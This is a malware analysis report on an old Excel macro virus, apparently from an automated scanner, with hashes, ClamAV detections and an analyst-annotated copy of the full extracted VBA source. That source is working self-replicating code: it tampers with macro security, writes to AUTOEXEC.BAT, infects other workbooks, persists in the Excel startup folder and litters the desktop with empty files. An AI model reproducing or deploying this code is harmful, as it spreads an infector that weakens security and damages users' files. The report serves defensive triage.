Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d4b0759884d6831d…

MALICIOUS

Office (OLE)

20.5 KB Created: 1996-10-14 23:33:28 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 62d253a33dab3595113dc6990a5fef31 SHA-1: 6abbf93650c37ede68980ad6c8e649ce0f8db1aa SHA-256: d4b0759884d6831d5ba25463c0df306ac65c06c5b67da40b719f10550f08b065
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

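The VBA macro appends to C:\AUTOEXEC.BAT and creates C:\Windows\Nor.drv, so it modifies a system startup file and drops a file into the Windows directory. The macro also attempts to disable security settings and writes its own code to that dropped file. The extracted script below shows that it then imports the file into other workbooks and saves a copy of itself into the Excel startup folder, which is a self-replication and persistence mechanism. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Xls.Trojan.Feeder-1' further support a malicious classification.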

Heuristics 2

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3828 bytes
SHA-256: e6d9559ce6def18a68d9dc26eb24cf0a537926161ee59c63297da0e9a2caf07f
Detection
ClamAV: Xls.Trojan.Feeder-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' MarshYello
Private Sub Workbook_activate()
' Goof By Yello 25/10/00
' Analyst note: every comment prefixed "Analyst note" or "NOTE(review)" was added
' during review and is not part of the sample. Code lines are unchanged.
' Analyst note: handler for the workbook Activate event. In order it hides UI
' feedback, appends two lines to c:\AUTOEXEC.BAT, tampers with macro-security
' settings, dumps its own source to C:\Windows\Nor.drv, saves a copy of the
' workbook into the Excel startup folder, overwrites the ThisWorkbook module of
' the active workbook when the marker comment is missing, and conditionally
' calls MY_Name.
' Analyst note: host artifacts visible in this routine, useful for triage:
' C:\Windows\Nor.drv, "Book1." in Application.StartupPath, added SET TEMP/SET TMP
' lines in c:\AUTOEXEC.BAT, and the marker comment "' MarshYello".
    ' Analyst note: all runtime errors below are suppressed, so any step that
    ' fails does so silently and execution continues.
    On Error Resume Next
        ' Analyst note: (5 * 2 - 10) evaluates to 0, i.e. False. Alerts, screen
        ' updating and the status bar are switched off.
        With Application
        .DisplayAlerts = (5 * 2 - 10)
        .Application.ScreenUpdating = (5 * 2 - 10)
        .Application.DisplayStatusBar = (5 * 2 - 10)
    End With
                ' Analyst note: the Chr() sequence decodes to
                ' SET TEMP=C:\WINDOWS\DESKTOP. It is appended on every run; no
                ' check for an existing entry is made.
                Open "c:\AUTOEXEC.BAT" For Append As #1
                Print #1, Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(84) & Chr(69) & Chr(77) & Chr(80) & Chr(61) & Chr(67) & Chr(58) & Chr(92) & Chr(87) & Chr(73) & Chr(78) & Chr(68) & Chr(79) & Chr(87) & Chr(83) & Chr(92) & Chr(68) & Chr(69) & Chr(83) & Chr(75) & Chr(84) & Chr(79) & Chr(80)
                Close #1
                ' Analyst note: same pattern; decodes to SET TMP=C:\WINDOWS\DESKTOP.
                Open "c:\AUTOEXEC.BAT" For Append As #1
                Print #1, Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(84) & Chr(77) & Chr(80) & Chr(61) & Chr(67) & Chr(58) & Chr(92) & Chr(87) & Chr(73) & Chr(78) & Chr(68) & Chr(79) & Chr(87) & Chr(83) & Chr(92) & Chr(68) & Chr(69) & Chr(83) & Chr(75) & Chr(84) & Chr(79) & Chr(80)
                Close #1
    ' Analyst note: disables the "Security..." control on the "Macro" command bar.
    CommandBars("Macro").Controls("Security...").Enabled = False
    ' NOTE(review): sets "Level" to 1 under the Office 9.0 *Word* security key.
    ' System.PrivateProfileString looks like Word's object model; in an Excel
    ' host this statement presumably fails and is hidden by On Error Resume
    ' Next - confirm in a sandbox.
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

    ' Analyst note: writes lines 1-65 of the first VB component's code module to
    ' C:\Windows\Nor.drv. SetAttr value 6 = vbHidden (2) + vbSystem (4).
    Open "C:\Windows\Nor.drv" For Output As #1
    Print #1, VBProject.VBComponents(1).codemodule.Lines(1, 65)
    Close #1
    SetAttr ("C:\Windows\Nor.drv"), 6

    ' Analyst note: handles to the ThisWorkbook code module of the active
    ' workbook and of the workbook containing this macro. ThisWB is not
    ' referenced again in this routine.
    Set ActiveWB = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
    Set ThisWB = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule

    ' Analyst note: if "Book1." is not yet in the Excel startup folder, the
    ' workbook is saved there (AddToMru:=False keeps it out of the recent-files
    ' list).
    CheckExist = Dir(Application.StartupPath & "\Book1.")
    If CheckExist = "" Then
    VBAProject.ThisWorkbook.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
    End If

    ' Analyst note: infection check. When line 3 of the active workbook's
    ' ThisWorkbook module is not the marker comment, the whole module is deleted,
    ' the dumped source is imported from Nor.drv and the workbook is saved.
    If ActiveWB.Lines(3, 1) <> "' MarshYello" Then
        ActiveWB.DeleteLines 1, ActiveWB.CountofLines
        ActiveWB.AddFromFile ("C:\Windows\Nor.drv")
        ActiveWorkbook.Save
    End If
' NOTE(review): takes two characters out of the string form of Time; whether
' that is the minutes or the seconds field depends on the host's time format -
' confirm. MY_Name is called when the value is >= 45.
trouble1 = Right(Time, 5)
trouble = Left(trouble1, 2)
If trouble >= 45 Then Call MY_Name
End Sub
Private Sub MY_Name()
' Analyst note: comments prefixed "Analyst note" were added during review and
' are not part of the sample. Code lines are unchanged.
' Analyst note: nuisance payload, called from Workbook_activate. Loops 1000
' times; each pass opens a randomly named file under c:\windows\desktop\ for
' output and closes it without writing, leaving an empty file. Because
' "For Output" truncates, an existing file with the same name would be emptied.
' Names can repeat, so fewer than 1000 distinct files may result.
Count = 0
Do
Randomize
' Analyst note: XXXX is a random integer 1..9999 used as the file name; ZZZZ is
' a random integer 1..5 that is replaced by an extension string below.
XXXX = Int((9999 * Rnd) + 1)
ZZZZ = Int((5 * Rnd) + 1)
' Analyst note: the Chr() sequences decode to .shs, .rat, .hlp, .js and .wav.
If ZZZZ = 1 Then ZZZZ = Chr(46) & Chr(115) & Chr(104) & Chr(115)
If ZZZZ = 2 Then ZZZZ = Chr(46) & Chr(114) & Chr(97) & Chr(116)
If ZZZZ = 3 Then ZZZZ = Chr(46) & Chr(104) & Chr(108) & Chr(112)
If ZZZZ = 4 Then ZZZZ = Chr(46) & Chr(106) & Chr(115)
If ZZZZ = 5 Then ZZZZ = Chr(46) & Chr(119) & Chr(97) & Chr(118)
Open "c:\windows\desktop\" & XXXX & ZZZZ For Output As #1
Close #1
Count = Count + 1
Loop Until Count = 1000
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True